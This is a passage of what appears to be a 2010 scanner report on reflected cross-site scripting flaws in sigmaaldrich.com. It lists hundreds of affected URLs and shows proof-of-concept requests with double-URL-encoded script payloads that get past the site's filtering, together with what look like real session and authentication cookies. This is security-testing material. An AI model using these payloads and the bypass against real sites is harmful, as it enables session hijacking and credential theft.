1.486. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 4]

1.487. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 5]

1.488. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 1]

1.489. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 2]

1.490. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 3]

1.491. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 4]

1.492. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 5]

1.493. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 1]

1.494. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 2]

1.495. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 3]

1.496. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 4]

1.497. http://www.sigmaaldrich.com/foresee/foresee-trigger.js [REST URL parameter 1]

1.498. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 1]

1.499. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 2]

1.500. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 1]

1.501. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 2]

1.502. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 1]

1.503. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 2]

1.504. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 1]

1.505. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 2]

1.506. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 1]

1.507. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 2]

1.508. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 3]

1.509. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 1]

1.510. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 2]

1.511. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 3]

1.512. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 1]

1.513. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 2]

1.514. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 3]

1.515. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 1]

1.516. http://www.sigmaaldrich.com/js/effects.js [REST URL parameter 2]

1.517. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 1]

1.518. http://www.sigmaaldrich.com/js/globallinks.js [REST URL parameter 2]

1.519. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 1]

1.520. http://www.sigmaaldrich.com/js/homenav.js [REST URL parameter 2]

1.521. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 1]

1.522. http://www.sigmaaldrich.com/js/jquery-min.js [REST URL parameter 2]

1.523. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 1]

1.524. http://www.sigmaaldrich.com/js/prototype.js [REST URL parameter 2]

1.525. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 1]

1.526. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 2]

1.527. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 1]

1.528. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 2]

1.529. http://www.sigmaaldrich.com/life-science.html [REST URL parameter 1]

1.530. http://www.sigmaaldrich.com/life-science/ [REST URL parameter 1]

1.531. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 1]

1.532. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 2]

1.533. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 1]

1.534. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 2]

1.535. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 1]

1.536. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 2]

1.537. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 1]

1.538. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 2]

1.539. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 1]

1.540. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 2]

1.541. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 1]

1.542. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 2]

1.543. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 1]

1.544. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 2]

1.545. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 3]

1.546. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 1]

1.547. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 2]

1.548. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 3]

1.549. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 4]

1.550. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html [REST URL parameter 1]

1.551. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 1]

1.552. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 2]

1.553. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 1]

1.554. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 2]

1.555. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 1]

1.556. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 2]

1.557. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 1]

1.558. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 2]

1.559. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 1]

1.560. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 2]

1.561. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 3]

1.562. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 1]

1.563. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 2]

1.564. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 3]

1.565. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 1]

1.566. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 2]

1.567. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 1]

1.568. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 2]

1.569. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 1]

1.570. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 2]

1.571. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 1]

1.572. http://www.sigmaaldrich.com/life-science/proteomics.html [REST URL parameter 2]

1.573. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 1]

1.574. http://www.sigmaaldrich.com/life-science/sigma-transgenics.html [REST URL parameter 2]

1.575. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 1]

1.576. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 2]

1.577. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 1]

1.578. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 2]

1.579. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 1]

1.580. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 2]

1.581. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 3]

1.582. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 1]

1.583. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 2]

1.584. http://www.sigmaaldrich.com/materials-science.html [REST URL parameter 1]

1.585. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 1]

1.586. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 2]

1.587. http://www.sigmaaldrich.com/materials-science/learning-center.html [REST URL parameter 1]

1.588. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 1]

1.589. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 2]

1.590. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 1]

1.591. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 2]

1.592. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 1]

1.593. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 2]

1.594. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 1]

1.595. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 2]

1.596. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 1]

1.597. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 2]

1.598. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 1]

1.599. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 2]

1.600. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 1]

1.601. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 2]

1.602. http://www.sigmaaldrich.com/materials-science/renewable-alternative-energy.html [REST URL parameter 1]

1.603. http://www.sigmaaldrich.com/safc-global/en-us/home.html [REST URL parameter 1]

1.604. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 1]

1.605. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 2]

1.606. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 3]

1.607. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 4]

1.608. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 5]

1.609. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 1]

1.610. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 2]

1.611. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 3]

1.612. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 4]

1.613. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 5]

1.614. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 1]

1.615. http://www.sigmaaldrich.com/sigma-aldrich/home.cookies.js [REST URL parameter 2]

1.616. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 1]

1.617. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 2]

1.618. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 1]

1.619. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 2]

1.620. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 3]

1.621. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 1]

1.622. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 2]

1.623. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 1]

1.624. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 2]

1.625. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 1]

1.626. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 2]

1.627. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 3]

1.628. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 1]

1.629. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 2]

1.630. http://www.sigmaaldrich.com/site-level/corporate/investor-relations.html [REST URL parameter 3]

1.631. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 1]

1.632. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 2]

1.633. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 3]

1.634. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 1]

1.635. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 2]

1.636. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 1]

1.637. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 2]

1.638. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 1]

1.639. http://www.sigmaaldrich.com/technical-service-home/product-catalog.html [REST URL parameter 2]

1.640. http://www.sigmaaldrich.com/united-states.html [REST URL parameter 1]
1. Cross-site scripting (reflected)
There are 640 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.sigmaaldrich.com/analytical-chromatography.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86200%2522%253balert%25281%2529%252f%252fd55c80e042a was submitted in the REST URL parameter 1. This input was echoed as 86200";alert(1)//d55c80e042a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /86200%2522%253balert%25281%2529%252f%252fd55c80e042a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/86200";alert(1)//d55c80e042a","E404") ;
   </script>
...[SNIP]...

1.2. http://www.sigmaaldrich.com/analytical-chromatography/air-monitoring.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/air-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fed%2522%253balert%25281%2529%252f%252f46bc722615b was submitted in the REST URL parameter 1. This input was echoed as 60fed";alert(1)//46bc722615b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography60fed%2522%253balert%25281%2529%252f%252f46bc722615b/air-monitoring.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography60fed";alert(1)//46bc722615b/air-monitoring.html","E404") ;
   </script>
...[SNIP]...

1.3. http://www.sigmaaldrich.com/analytical-chromatography/air-monitoring.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/air-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5adfd%2522%253balert%25281%2529%252f%252f6b84be9a72b was submitted in the REST URL parameter 2. This input was echoed as 5adfd";alert(1)//6b84be9a72b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/5adfd%2522%253balert%25281%2529%252f%252f6b84be9a72b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
